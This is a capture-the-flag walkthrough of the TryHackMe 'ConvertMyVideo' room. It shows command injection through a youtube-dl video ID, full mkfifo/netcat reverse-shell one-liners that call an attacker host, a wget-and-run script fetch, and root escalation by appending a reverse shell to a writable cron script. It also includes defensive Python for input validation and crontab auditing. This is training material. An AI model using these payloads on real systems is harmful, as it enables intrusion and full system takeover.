TryHackMe: ConvertMyVideo

1. What is the name of the secret folder?

Port scan

nmap -Pn <ip>

There are two open ports: 22 and 80.

OS and service scan

nmap -A -p 22,80 <ip>

Port 22 is OpenSSH and port 80 is Apache HTTP.

This machine is Ubuntu.

Vuln scan

nmap --script vuln -p 22,80 <ip>

There's an /admin/ directory.

Access the site. It asks me to input a YouTube video ID.

View the page source: nothing useful.

Try inputting "test".

Nothing happens.

Intercept w/ Burp Suite

Send to repeater

There’s an error.

Googling the error message led me to youtube-dl on GitHub.

After reading through the GitHub issues I came across this. I may be able to do command injection.

I will inject with

`whoami`

When I do the injection I will put the payload in backticks (`), because the backtick has precedence over the other symbols.

Success!!!
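The injection works because the web application hands the submitted video ID to a shell that then runs youtube-dl, so the backtick payload is substituted before youtube-dl ever sees it. The Python below is an added example, not code from the room or from youtube-dl: it shows the string-concatenation pattern that makes this possible next to a hardened version that allow-lists the ID format and passes an argv list to subprocess with no shell, which also defeats the `${IFS}` and `%26` encoding tricks used later in the writeup. The function names, the assumed 11-character ID rule and the sample ID are my own.

```python
import re
import subprocess

# Assumed allow-list for a YouTube video ID: exactly 11 characters from the
# URL-safe base64 alphabet. Backticks, $, {, }, ;, | and & can never match.
VIDEO_ID_RE = re.compile(r"[A-Za-z0-9_-]{11}")


def is_valid_video_id(video_id: str) -> bool:
    """Return True only if the value looks like a plain YouTube video ID."""
    return VIDEO_ID_RE.fullmatch(video_id) is not None


def build_command_unsafe(video_id: str) -> str:
    """The vulnerable pattern: untrusted input concatenated into a shell
    string. If this string were given to a shell, a value wrapped in backticks
    would be executed before youtube-dl runs. Returned only for contrast;
    never executed here."""
    return "youtube-dl " + video_id


def build_argv_safe(video_id: str) -> list:
    """Hardened form: reject anything outside the allow-list, then build an
    argv list. Each element is passed to execve as a single argument, so no
    shell metacharacter is ever interpreted."""
    if not is_valid_video_id(video_id):
        raise ValueError("invalid video id")
    url = "https://www.youtube.com/watch?v=" + video_id
    return ["youtube-dl", url]


def run_safe(video_id: str) -> subprocess.CompletedProcess:
    """Run youtube-dl on a validated ID. shell=False is the default, so the
    argv list goes straight to the kernel without a shell in between."""
    argv = build_argv_safe(video_id)
    return subprocess.run(argv, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    sample_id = "a1B2c3D4e5F"  # constructed sample, not a real video
    print(build_argv_safe(sample_id))
    for payload in ("`whoami`", "x${IFS}y", "a%26b"):
        print(payload, "->", is_valid_video_id(payload))
```

The allow-list is the real control here: escaping with escapeshellarg-style quoting would also stop this particular payload, but validating the ID against the only shape it can legitimately have removes the whole class of problem and makes the rejected input easy to log and alert on.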

Let’s get reverse shell.

Prepare listener on port 1234

nc -lvp 1234

Prepare reverse shell

Reference:

I will use this command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

After pasting it, I need to replace the spaces.

I will try "%20".

I also need to replace "&".

Replace it with "%26".

Error

It seems replacing spaces with "%20" does not work. I will try ${IFS} instead.

Paste it

Back at the listener I have a connection, but I lose it almost immediately.

Let’s try another way

I will upload a script and run it.

Create script.sh using the same reverse shell command

Start an HTTP server to serve the script

python -m SimpleHTTPServer 80

Back to repeater

wget${IFS}http://<ip>/script.sh

Download success

Run the script

bash${IFS}script.sh

Now I have a shell.

2. What is the user to access the secret folder?

Get TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

I know there is an '/admin' directory. Let's explore the system.

ls
cd admin
ls
cat flag.txt

Now I have the user flag.

cat index.php

Nothing

ls -la

There are hidden files.

cat .htpasswd

3. What is the user flag?
ANS: It’s in #2

4. What is the root flag?

Let's escalate privileges.

Sudo

sudo -l

SUID

find / -perm -u=s -type f 2>/dev/null

Cronjob

cat /etc/crontab

Capabilities

getcap -r / 2>/dev/null

Looking for service

ps aux | grep "^root"

There's a cron job running, but I don't know where the script is.

Let's upload pspy to observe the processes.

I need to check the machine architecture first.

uname -a

This machine is 64-bit. I need to upload pspy64

wget http://<ip>/pspy64

Change its permission

chmod +xs pspy64

Run pspy64

./pspy64

After waiting about 1–2 minutes, I found the script.

cat /var/www/html/tmp/clean.sh

I can append a reverse shell command to it.

Prepare listener on port 1235

Here’s my command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1235 >/tmp/f

Append

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1235 >/tmp/f" >> /var/www/html/tmp/clean.sh

Verify the append

cat /var/www/html/tmp/clean.sh

Back to listener port 1235

whoami

I’m root.

cd /root
ls
cat root.txt
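The root step above works only because a script that root runs from cron is writable by the low-privileged web user. The Python below is an added example, not part of the writeup or of pspy: it parses a system-crontab text, pulls out the absolute paths each root job executes, and reports any script that is group- or world-writable or lives in a directory where it could be swapped out. The sample crontab, the temp directory and the function names are constructed for the demo; on a real host you would feed it /etc/crontab and the files under /etc/cron.d.

```python
import os
import re
import stat
import tempfile

# Any absolute path inside a cron command (stops at whitespace and shell operators).
ABS_PATH_RE = re.compile(r"/[^\s;|&><]+")
OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def parse_crontab(text: str):
    """Yield (user, command) from /etc/crontab-style text:
    'm h dom mon dow user command' or '@reboot user command'.
    Comments, blank lines and VAR=value assignments are skipped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) == 3:
                pairs.append((parts[1], parts[2]))
            continue
        if "=" in line.split(None, 1)[0]:
            continue  # PATH=..., SHELL=..., MAILTO=...
        parts = line.split(None, 6)
        if len(parts) == 7:
            pairs.append((parts[5], parts[6]))
    return pairs


def insecure_reasons(path: str) -> list:
    """Explain why a script run by cron could be modified by someone other
    than its owner: writable bits on the file, or a writable parent directory
    without the sticky bit (the file itself can then be replaced)."""
    reasons = []
    if os.stat(path).st_mode & OTHER_WRITE:
        reasons.append("script is group/world-writable")
    parent = os.stat(os.path.dirname(path) or "/").st_mode
    if parent & OTHER_WRITE and not parent & stat.S_ISVTX:
        reasons.append("parent directory is writable, script can be replaced")
    return reasons


def audit_crontab(text: str) -> list:
    """Return one finding per cron-invoked script that a non-owner can change."""
    findings = []
    for user, command in parse_crontab(text):
        for path in ABS_PATH_RE.findall(command):
            if not os.path.isfile(path):
                continue  # /dev/null, directories, missing scripts
            reasons = insecure_reasons(path)
            if reasons:
                findings.append({"user": user, "path": path, "reasons": reasons})
    return findings


def demo() -> list:
    """Constructed scenario: two scripts in a private temp dir, one left
    world-writable the way the room's clean.sh was. Returns the findings."""
    workdir = tempfile.mkdtemp()  # created 0700, so the directory check stays clean
    bad = os.path.join(workdir, "clean.sh")
    good = os.path.join(workdir, "rotate.sh")
    for script in (bad, good):
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\n# placeholder body for the demo\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    crontab = (
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "# m h dom mon dow user command\n"
        f"* * * * * root bash {bad}\n"
        f"0 3 * * * root {good} >/dev/null 2>&1\n"
        f"@reboot root {workdir}/missing.sh\n"
    )
    return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in demo():
        print(finding["user"], finding["path"], ", ".join(finding["reasons"]))
```

Running the same audit over the real crontab files, and the scripts under /etc/cron.*, is a cheap periodic check; the fix for any hit is `chmod 755` plus `chown root:root` on the script and on every directory leading to it, so that a web-server account can no longer append to something root executes.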